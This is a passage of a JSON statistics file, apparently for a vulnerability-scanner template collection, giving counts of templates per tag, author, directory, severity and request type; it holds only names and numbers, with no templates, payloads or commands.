,{"name":"microsoft","count":5},{"name":"dedecms","count":5},{"name":"ssti","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"deserialization","count":5},{"name":"iis","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"nodejs","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"wso2","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"resin","count":4},{"name":"crlf","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"magmi","count":4},{"name":"proxy","count":4},{"name":"vpn","count":4},{"name":"firmware","count":4},{"name":"artifactory","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"buffalo","count":4},{"name":"elastic","count":4},{"name":"symfony","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"openssh","count":3},{"name":"fanruan","count":3},{"name":"httpd","count":3},{"name":"tikiwiki","count":3},{"name":"bypass","count":3},{"name":"springcloud","count":3},{"name":"nacos","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"ebs","count":3},{"name":"ssh","count":3},{"name":"backups","count":3},{"name":"firebase","count":3},{"name":"fpd","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"terramaster","count":3},{"name":"caucho","count":3},{"name":"ofbiz","count":3},{"name":"slack","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"log","count":3},{"name":"mail","count":3},{"name":"openam","count":3},{"name":"zabbix","count":3},{"name":"camera","count":3},{"name":"vbulletin","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"kibana","count":3},{"name":"git","count":3},{"name":"npm","count":3},{"name":"kevinlab","count":3},{"name":"microstrategy","count":3},{"name":"druid","count":3},{"name":"bitrix","count":3},{"name":"injection","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"telerik","count":3},{"name":"itop","count":3},{"name":"linkerd","count":3},{"name":"mongodb","count":3},{"name":"zhiyuan","count":3},{"name":"smtp","count":3},{"name":"opensis","count":3},{"name":"openfire","count":2},{"name":"cache","count":2},{"name":"axis","count":2},{"name":"oauth","count":2},{"name":"shellshock","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"ucmdb","count":2},{"name":"nextjs","count":2},{"name":"cve2005","count":2},{"name":"splunk","count":2},{"name":"ec2","count":2},{"name":"activemq","count":2},{"name":"db","count":2},{"name":"hoteldruid","count":2},{"name":"jsf","count":2},{"name":"xxljob","count":2},{"name":"seeyon","count":2},{"name":"frp","count":2},{"name":"showdoc","count":2},{"name":"hostheader-injection","count":2},{"name":"dolibarr","count":2},{"name":"glassfish","count":2},{"name":"hasura","count":2},{"name":"horde","count":2},{"name":"bucket","count":2},{"name":"icewarp","count":2},{"name":"ecology","count":2},{"name":"wordfence","count":2},{"name":"storage","count":2},{"name":"status","count":2},{"name":"akkadian","count":2},{"name":"netis","count":2},{"name":"backdoor","count":2},{"name":"kentico","count":2},{"name":"yii","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"geowebserver","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"pega","count":2},{"name":"sharepoint","count":2},{"name":"spark","count":2},{"name":"harbor","count":2},{"name":"totemomail","count":2},{"name":"phpcollab","count":2},{"name":"sonicwall","count":2},{"name":"avantfax","count":2},{"name":"netsweeper","count":2},{"name":"fortios","count":2},{"name":"service","count":2},{"name":"odoo","count":2},{"name":"rockethchat","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"leak","count":2},{"name":"jeedom","count":2},{"name":"nagios","count":2},{"name":"ilo","count":2},{"name":"adminer","count":2},{"name":"prtg","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"rockmongo","count":2},{"name":"middleware","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"akamai","count":2},{"name":"axis2","count":2},{"name":"bruteforce","count":2},{"name":"sonarqube","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"guacamole","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"waf","count":2},{"name":"jboss","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"github","count":2},{"name":"node","count":2},{"name":"paloalto","count":2},{"name":"azure","count":2},{"name":"kong","count":2},{"name":"liferay","count":2},{"name":"grav","count":2},{"name":"chiyu","count":2},{"name":"couchdb","count":2},{"name":"vrealize","count":2},{"name":"flir","count":2},{"name":"cve2007","count":2},{"name":"globalprotect","count":2},{"name":"trixbox","count":2},{"name":"nextcloud","count":2},{"name":"beanshell","count":1},{"name":"wondercms","count":1},{"name":"tor","count":1},{"name":"sar2html","count":1},{"name":"erp-nc","count":1},{"name":"uwsgi","count":1},{"name":"swagger","count":1},{"name":"wmt","count":1},{"name":"yealink","count":1},{"name":"plastic","count":1},{"name":"announcekit","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"jfrog","count":1},{"name":"phpwiki","count":1},{"name":"aura","count":1},{"name":"openrestry","count":1},{"name":"gstorage","count":1},{"name":"mailchimp","count":1},{"name":"h3c-imc","count":1},{"name":"visualtools","count":1},{"name":"realteo","count":1},{"name":"solman","count":1},{"name":"vsftpd","count":1},{"name":"api-manager","count":1},{"name":"pacsone","count":1},{"name":"razor","count":1},{"name":"opencast","count":1},{"name":"landrayoa","count":1},{"name":"cve2006","count":1},{"name":"traefik","count":1},{"name":"graphql","count":1},{"name":"maccmsv10","count":1},{"name":"upload","count":1},{"name":"clink-office","count":1},{"name":"owa","count":1},{"name":"bolt","count":1},{"name":"sureline","count":1},{"name":"checkpoint","count":1},{"name":"dotnet","count":1},{"name":"bedita","count":1},{"name":"fortigate","count":1},{"name":"eyou","count":1},{"name":"mysql","count":1},{"name":"frontpage","count":1},{"name":"varnish","count":1},{"name":"sitecore","count":1},{"name":"auth","count":1},{"name":"gogs","count":1},{"name":"hiawatha","count":1},{"name":"mpsec","count":1},{"name":"bash","count":1},{"name":"actuator","count":1},{"name":"resourcespace","count":1},{"name":"visionhub","count":1},{"name":"pgadmin","count":1},{"name":"wifisky","count":1},{"name":"exposures","count":1},{"name":"ambari","count":1},{"name":"keenetic","count":1},{"name":"logontracer","count":1},{"name":"xml","count":1},{"name":"avalanche","count":1},{"name":"sceditor","count":1},{"name":"starttls","count":1},{"name":"terraform","count":1},{"name":"nuxeo","count":1},{"name":"lansweeper","count":1},{"name":"spf","count":1},{"name":"episerver","count":1},{"name":"adb","count":1},{"name":"jquery","count":1},{"name":"bazarr","count":1},{"name":"scimono","count":1},{"name":"cves2016","count":1},{"name":"twitter-server","count":1},{"name":"esmtp","count":1},{"name":"bitly","count":1},{"name":"zookeeper","count":1},{"name":"zeroshell","count":1},{"name":"ems","count":1},{"name":"timeclock","count":1},{"name":"spip","count":1},{"name":"moin","count":1},{"name":"codeigniter","count":1},{"name":"doh","count":1},{"name":"wazuh","count":1},{"name":"alerta","count":1},{"name":"simplecrm","count":1},{"name":"karel","count":1},{"name":"synnefo","count":1},{"name":"couchbase","count":1},{"name":"socomec","count":1},{"name":"sco","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"livezilla","count":1},{"name":"micrsoft","count":1},{"name":"chyrp","count":1},{"name":"zm","count":1},{"name":"pmb","count":1},{"name":"74cms","count":1},{"name":"accela","count":1},{"name":"b2evolution","count":1},{"name":"ioncube","count":1},{"name":"lotus","count":1},{"name":"postmessage","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"cgi","count":1},{"name":"feifeicms","count":1},{"name":"rmi","count":1},{"name":"javafaces","count":1},{"name":"metabase","count":1},{"name":"xunchi","count":1},{"name":"htmli","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"openx","count":1},{"name":"mantisbt","count":1},{"name":"zenario","count":1},{"name":"clave","count":1},{"name":" default-login","count":1},{"name":"ssltls","count":1},{"name":"opentsdb","count":1},{"name":"sophos","count":1},{"name":"zarafa","count":1},{"name":"ntopng","count":1},{"name":"sidekiq","count":1},{"name":"elascticsearch","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"redis","count":1},{"name":"pippoint","count":1},{"name":"pagespeed","count":1},{"name":"lutron","count":1},{"name":"nette","count":1},{"name":"glances","count":1},{"name":"expose","count":1},{"name":"ewebs","count":1},{"name":"flash","count":1},{"name":"meraki","count":1},{"name":"k8s","count":1},{"name":"redwood","count":1},{"name":"asus","count":1},{"name":"csod","count":1},{"name":"viewpoint","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"avtech","count":1},{"name":"opensns","count":1},{"name":"appweb","count":1},{"name":"camunda","count":1},{"name":"enum","count":1},{"name":"nc2","count":1},{"name":"qsan","count":1},{"name":"sprintful","count":1},{"name":"upnp","count":1},{"name":"s3","count":1},{"name":"oneblog","count":1},{"name":"graphite","count":1},{"name":"kyan","count":1},{"name":"javascript","count":1},{"name":"ssl","count":1},{"name":"nomad","count":1},{"name":"vsphere","count":1},{"name":"bullwark","count":1},{"name":"dvr","count":1},{"name":"dotnetnuke","count":1},{"name":"huijietong","count":1},{"name":"blind","count":1},{"name":"nexusdb","count":1},{"name":"shoppable","count":1},{"name":"netdata","count":1},{"name":"wiki","count":1},{"name":"webmin","count":1},{"name":"embedthis","count":1},{"name":"addpac","count":1},{"name":"javamelody","count":1},{"name":"perl","count":1},{"name":"selea","count":1},{"name":"node-red-dashboard","count":1},{"name":"nedi","count":1},{"name":"yachtcontrol","count":1},{"name":"memcached","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"cofax","count":1},{"name":"circontrol","count":1},{"name":"spectracom","count":1},{"name":"faraday","count":1},{"name":"dnssec","count":1},{"name":"acme","count":1},{"name":"blackboard","count":1},{"name":"minio","count":1},{"name":"froxlor","count":1},{"name":"ghost","count":1},{"name":"darkstat","count":1},{"name":"jmx","count":1},{"name":"turbocrm","count":1},{"name":"xmlchart","count":1},{"name":"geutebruck","count":1},{"name":"eprints","count":1},{"name":"comodo","count":1},{"name":"zzzcms","count":1},{"name":"rsyncd","count":1},{"name":"servicedesk","count":1},{"name":"basic-auth","count":1},{"name":"kafdrop","count":1},{"name":"qcubed","count":1},{"name":"mara","count":1},{"name":"kubeflow","count":1},{"name":"monitorix","count":1},{"name":"jaspersoft","count":1},{"name":"jenzabar","count":1},{"name":"tjws","count":1},{"name":"openemr","count":1},{"name":"zyxel","count":1},{"name":"minimouse","count":1},{"name":"goahead","count":1},{"name":"tensorboard","count":1},{"name":"phpfastcache","count":1},{"name":"clusterengine","count":1},{"name":"qdpm","count":1},{"name":"dompdf","count":1},{"name":"influxdb","count":1},{"name":"skywalking","count":1},{"name":"office365","count":1},{"name":"linkedin","count":1},{"name":"alibaba","count":1},{"name":"klog","count":1},{"name":"jnoj","count":1},{"name":"proftpd","count":1},{"name":"aspnuke","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"nuuo","count":1},{"name":"jenkin","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"gateone","count":1},{"name":"webadmin","count":1},{"name":"biometrics","count":1},{"name":"duomicms","count":1},{"name":"kerbynet","count":1},{"name":"rdp","count":1},{"name":"setup","count":1},{"name":"xvr","count":1},{"name":"nordex","count":1},{"name":"lighttpd","count":1},{"name":"scs","count":1},{"name":"openvpn","count":1},{"name":"listserv","count":1},{"name":"rfi","count":1},{"name":"labtech","count":1},{"name":"crm","count":1},{"name":"iptime","count":1},{"name":"svnserve","count":1},{"name":"mongo","count":1},{"name":"csrf","count":1},{"name":"ulterius","count":1},{"name":"salesforce","count":1},{"name":"netgenie","count":1},{"name":"cocoon","count":1},{"name":"sarg","count":1},{"name":"interlib","count":1},{"name":"magicflow","count":1},{"name":"sqlite","count":1},{"name":"netrc","count":1},{"name":"plone","count":1},{"name":"zmanda","count":1},{"name":"oscommerce","count":1},{"name":"chevereto","count":1},{"name":"oidc","count":1},{"name":"gespage","count":1},{"name":"wing-ftp","count":1},{"name":"fiori","count":1},{"name":"calendarix","count":1},{"name":"pihole","count":1},{"name":"tika","count":1},{"name":"getsimple","count":1},{"name":"etouch","count":1},{"name":"clockwatch","count":1},{"name":"haproxy","count":1},{"name":"qvisdvr","count":1},{"name":"totaljs","count":1},{"name":"domxss","count":1},{"name":"nps","count":1},{"name":"payara","count":1},{"name":"cloudinary","count":1},{"name":"vnc","count":1},{"name":"gitlist","count":1},{"name":"panabit","count":1},{"name":"rhymix","count":1},{"name":"diris","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"processmaker","count":1},{"name":"nimble","count":1},{"name":"whm","count":1},{"name":"szhe","count":1},{"name":"blue-ocean","count":1},{"name":"tongda","count":1},{"name":"lancom","count":1},{"name":"fortiweb","count":1},{"name":"sangfor","count":1},{"name":"trane","count":1},{"name":"dbeaver","count":1},{"name":"opm","count":1},{"name":"robomongo","count":1},{"name":"phalcon","count":1},{"name":"werkzeug","count":1},{"name":"octoprint","count":1},{"name":"plugin","count":1},{"name":"artica","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"krweb","count":1},{"name":"email","count":1},{"name":"tpshop","count":1},{"name":"trilithic","count":1},{"name":"tectuus","count":1},{"name":"vidyo","count":1},{"name":"clockwork","count":1},{"name":"octobercms","count":1},{"name":"burp","count":1},{"name":"alertmanager","count":1},{"name":"cse","count":1},{"name":"nsasg","count":1},{"name":"pyramid","count":1},{"name":"bigbluebutton","count":1},{"name":"webftp","count":1},{"name":"drone","count":1},{"name":"rujjie","count":1},{"name":"idemia","count":1},{"name":"wavlink","count":1},{"name":"circontrorl","count":1},{"name":"gotmls","count":1},{"name":"nweb2fax","count":1},{"name":"enumeration","count":1},{"name":"soar","count":1},{"name":"parentlink","count":1},{"name":"grails","count":1},{"name":"default","count":1},{"name":"monitorr","count":1},{"name":"mongoshake","count":1},{"name":"sourcebans","count":1},{"name":"expn","count":1},{"name":"postgres","count":1},{"name":"argussurveillance","count":1},{"name":"owasp","count":1},{"name":"manageengine","count":1},{"name":"flink","count":1},{"name":"commax","count":1},{"name":"lotuscms","count":1},{"name":"seacms","count":1},{"name":"netmask","count":1},{"name":"tileserver","count":1},{"name":"spidercontrol","count":1},{"name":"apos","count":1},{"name":"tieline","count":1},{"name":"eyelock","count":1},{"name":"ganglia","count":1},{"name":"tracer","count":1},{"name":"panos","count":1},{"name":"ruby","count":1},{"name":"wuzhicms","count":1},{"name":"gloo","count":1},{"name":"zend","count":1},{"name":"rmc","count":1},{"name":"st","count":1},{"name":"chinaunicom","count":1},{"name":"daybyday","count":1},{"name":"cyberoam","count":1},{"name":"fortinet","count":1},{"name":"phpunit","count":1},{"name":"smi","count":1},{"name":"mediumish","count":1},{"name":"shopxo","count":1},{"name":"pcoip","count":1},{"name":"primetek","count":1},{"name":"bookstack","count":1},{"name":"tenda","count":1},{"name":"acontent","count":1},{"name":"metinfo","count":1},{"name":"tensorflow","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"empirecms","count":1},{"name":"hadoop","count":1},{"name":"dotclear","count":1},{"name":"jitsi","count":1},{"name":"ilo4","count":1},{"name":"eg","count":1},{"name":"redhat","count":1},{"name":"redmine","count":1},{"name":"ruckus","count":1},{"name":"woocomernce","count":1},{"name":"ognl","count":1},{"name":"jeewms","count":1},{"name":"moinmoin","count":1},{"name":"xff","count":1},{"name":"fortigates","count":1},{"name":"tcexam","count":1},{"name":"clickhouse","count":1},{"name":"fastapi","count":1},{"name":"extractor","count":1},{"name":"nifi","count":1},{"name":"wavemaker","count":1},{"name":"weiphp","count":1},{"name":"gridx","count":1},{"name":"fedora","count":1},{"name":"zcms","count":1},{"name":"sentry","count":1},{"name":"codemeter","count":1},{"name":"aruba","count":1},{"name":"smartsense","count":1},{"name":"achecker","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plc","count":1},{"name":"saltapi","count":1},{"name":"lg-nas","count":1},{"name":"fuelcms","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"wamp","count":1},{"name":"dom","count":1},{"name":"cloudflare","count":1},{"name":"wildfly","count":1},{"name":"arl","count":1},{"name":"phpinfo","count":1},{"name":"floc","count":1},{"name":"solarlog","count":1},{"name":"tidb","count":1},{"name":"mobileiron","count":1},{"name":"cobub","count":1},{"name":"concrete","count":1},{"name":"pulsesecure","count":1},{"name":"dvwa","count":1},{"name":"optiLink","count":1},{"name":"apiman","count":1},{"name":"finereport","count":1},{"name":"portainer","count":1},{"name":"viewlinc","count":1},{"name":"thinkadmin","count":1},{"name":"cors","count":1},{"name":"redcap","count":1},{"name":"graylog","count":1},{"name":"powercreator","count":1},{"name":"zms","count":1},{"name":"jsp","count":1},{"name":"sgp","count":1},{"name":"gunicorn","count":1},{"name":"linux","count":1},{"name":"miscrsoft","count":1},{"name":"centos","count":1},{"name":"craftcms","count":1},{"name":"mariadb","count":1},{"name":"emby","count":1},{"name":"ricoh","count":1},{"name":"cockpit","count":1},{"name":"cherokee","count":1},{"name":"triconsole","count":1},{"name":"fortilogger","count":1},{"name":"mautic","count":1},{"name":"ueditor","count":1},{"name":"mrtg","count":1},{"name":"openstack","count":1},{"name":"xdcms","count":1},{"name":"expressjs","count":1},{"name":"hortonworks","count":1},{"name":"azkaban","count":1},{"name":"mantis","count":1},{"name":"myvuehelp","count":1},{"name":"lanproxy","count":1},{"name":"opensmtpd","count":1},{"name":"webui","count":1},{"name":"linksys","count":1},{"name":"myucms","count":1},{"name":"xiuno","count":1},{"name":"zte","count":1},{"name":"rabbitmq","count":1},{"name":"k8","count":1},{"name":"servicenow","count":1},{"name":"rubedo","count":1},{"name":"svn","count":1},{"name":"tamronos","count":1},{"name":"landray","count":1},{"name":"subrion","count":1},{"name":"cerebro","count":1},{"name":"exacqvision","count":1},{"name":"exponentcms","count":1},{"name":"websvn","count":1},{"name":"webmodule-ee","count":1},{"name":"ns","count":1},{"name":"timesheet","count":1},{"name":"commscope","count":1}],"authors":[{"name":"dhiyaneshdk","count":252},{"name":"pikpikcu","count":250},{"name":"daffainfo","count":199},{"name":"pdteam","count":195},{"name":"geeknik","count":151},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":60},{"name":"pussycat0x","count":58},{"name":"gaurang","count":42},{"name":"0x_akoko","count":33},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":23},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"meme-lord","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"vsh00t","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"johnk3r","count":3},{"name":"idealphase","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"jarijaas","count":3},{"name":"shine","count":3},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"g4l1t0","count":2},{"name":"parth","count":2},{"name":"joeldeleep","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"0xelkomy","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"cocxanh","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"lotusdll","count":2},{"name":"pxmme1337","count":2},{"name":"gal nagli","count":2},{"name":"alifathi-h1","count":2},{"name":"swissky","count":2},{"name":"johnjhacking","count":2},{"name":"r3naissance","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"bsysop","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"unstabl3","count":2},{"name":"randomrobbie","count":2},{"name":"socketz","count":2},{"name":"sushantkamble","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"0xprial","count":2},{"name":"arcc","count":2},{"name":"0xcrypto","count":2},{"name":"convisoappsec","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"nkxxkn","count":2},{"name":"0xrudra","count":2},{"name":"mohammedsaneem","count":2},{"name":"ehsahil","count":2},{"name":"0h1in9e","count":1},{"name":"sickwell","count":1},{"name":"ringo","count":1},{"name":"bernardofsr","count":1},{"name":"noamrathaus","count":1},{"name":"mah3sec_","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"juicypotato1","count":1},{"name":"ilovebinbash","count":1},{"name":"c3l3si4n","count":1},{"name":"ahmed sherif","count":1},{"name":"schniggie","count":1},{"name":"borna nematzadeh","count":1},{"name":"_harleo","count":1},{"name":"intx0x80","count":1},{"name":"j33n1k4","count":1},{"name":"alperenkesk","count":1},{"name":"willd96","count":1},{"name":"undefl0w","count":1},{"name":"cookiehanhoan","count":1},{"name":"@dwisiswant0","count":1},{"name":"remonsec","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"furkansenan","count":1},{"name":"52971","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"sec_hawk","count":1},{"name":"kre80r","count":1},{"name":"me9187","count":1},{"name":"b0yd","count":1},{"name":"makyotox","count":1},{"name":"shifacyclewla","count":1},{"name":"th3.d1p4k","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sshell","count":1},{"name":"iampritam","count":1},{"name":"_c0wb0y_","count":1},{"name":"hanlaomo","count":1},{"name":"omarkurt","count":1},{"name":"rodnt","count":1},{"name":"berkdusunur","count":1},{"name":"evolutionsec","count":1},{"name":"nytr0gen","count":1},{"name":"affix","count":1},{"name":"b4uh0lz","count":1},{"name":"kabirsuda","count":1},{"name":"kurohost","count":1},{"name":"sullo","count":1},{"name":"knassar702","count":1},{"name":"geraldino2","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"philippdelteil","count":1},{"name":"bjhulst","count":1},{"name":"pdp","count":1},{"name":"smaranchand","count":1},{"name":"0ut0fb4nd","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"divya_mudgal","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"patralos","count":1},{"name":"jeya seelan","count":1},{"name":"notsoevilweasel","count":1},{"name":"jteles","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mesaglio","count":1},{"name":"shelld3v","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sy3omda","count":1},{"name":"alph4byt3","count":1},{"name":"ldionmarcil","count":1},{"name":"blckraven","count":1},{"name":"yavolo","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mubassirpatel","count":1},{"name":"hakluke","count":1},{"name":"co0nan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"raesene","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"adrianmf","count":1},{"name":"izn0u","count":1},{"name":"apt-mirror","count":1},{"name":"thezakman","count":1},{"name":"ooooooo_q","count":1},{"name":"andysvints","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"infosecsanyam","count":1},{"name":"its0x08","count":1},{"name":"elmahdi","count":1},{"name":"alex","count":1},{"name":"ahmetpergamum","count":1},{"name":"revblock","count":1},{"name":"becivells","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"bad5ect0r","count":1},{"name":"tirtha_mandal","count":1},{"name":"bolli95","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"shreyapohekar","count":1},{"name":"tim_koopmans","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"micha3lb3n","count":1},{"name":"yashanand155","count":1},{"name":"0xrod","count":1},{"name":"toufik airane","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"qlkwej","count":1},{"name":"fmunozs","count":1},{"name":"0xtavian","count":1},{"name":"b0rn2r00t","count":1},{"name":"fopina","count":1},{"name":"gboddin","count":1},{"name":"exploitation","count":1},{"name":"zandros0","count":1},{"name":"push4d","count":1},{"name":"sicksec","count":1},{"name":"ipanda","count":1},{"name":"flag007","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"regala_","count":1},{"name":"ajaysenr","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"taielab","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"s1r1u5_","count":1},{"name":"pratik khalane","count":1},{"name":"pudsec","count":1},{"name":"streetofhackerr007","count":1}],"directory":[{"name":"cves","count":696},{"name":"vulnerabilities","count":291},{"name":"exposed-panels","count":247},{"name":"exposures","count":186},{"name":"technologies","count":178},{"name":"misconfiguration","count":131},{"name":"takeovers","count":63},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":625},{"name":"high","count":540},{"name":"medium","count":428},{"name":"critical","count":267},{"name":"low","count":147}],"types":[{"name":"http","count":1904},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":702},{"name":"lfi","count":253},{"name":"panel","count":248},{"name":"xss","count":240},{"name":"exposure","count":228},{"name":"wordpress","count":212},{"name":"rce","count":197},{"name":"tech","count":173},{"name":"cve2020","count":162},{"name":"wp-plugin","count":143},{"name":"cve2021","count":123},{"name":"cve2019","count":95},{"name":"config","count":93},{"name":"cve2018","count":83},{"name":"joomla","count":77},{"name":"apache","count":69},{"name":"takeover","count":67},{"name":"cve2010","count":67},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":52},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"oracle","count":36},{"name":"ssrf","count":36},{"name":"","count":36},{"name":"cve2016","count":34},{"name":"redirect","count":30},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":21},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"router","count":19},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"cve2014","count":16},{"name":"misconfig","count":15},{"name":"weblogic","count":14},{"name":"cve2011","count":14},{"name":"struts","count":14},{"name":"php","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"fuzz","count":13},{"name":"devops","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"aws","count":11},{"name":"cve2013","count":11},{